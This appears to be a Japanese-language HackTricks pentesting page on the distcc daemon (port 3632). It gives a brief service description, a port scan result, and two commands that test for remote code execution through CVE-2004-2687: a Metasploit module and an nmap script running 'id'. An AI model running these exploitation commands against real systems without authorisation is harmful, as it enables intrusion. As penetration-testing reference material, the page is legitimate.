hacktricks/network-services-pentesting/3632-pentesting-distcc.md
2023-07-07 23:42:27 +00:00

4.7 KiB
Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

基本情報

Distccは、他のコンピュータの未使用の処理能力を利用してコンパイルを高速化するために設計されています。Distccがインストールされたマシンは、distccdデーモンと互換性のあるコンパイラがインストールされたコンピュータにコードをネットワーク経由で送信してコンパイルすることができます。

デフォルトポート: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

CVE-2004-2687による任意のコードの実行が可能かどうかをチェックします:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

このサービスはShodanでは検出されないと思います。

リソース

Álex B (@r1p) によって作成された投稿

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥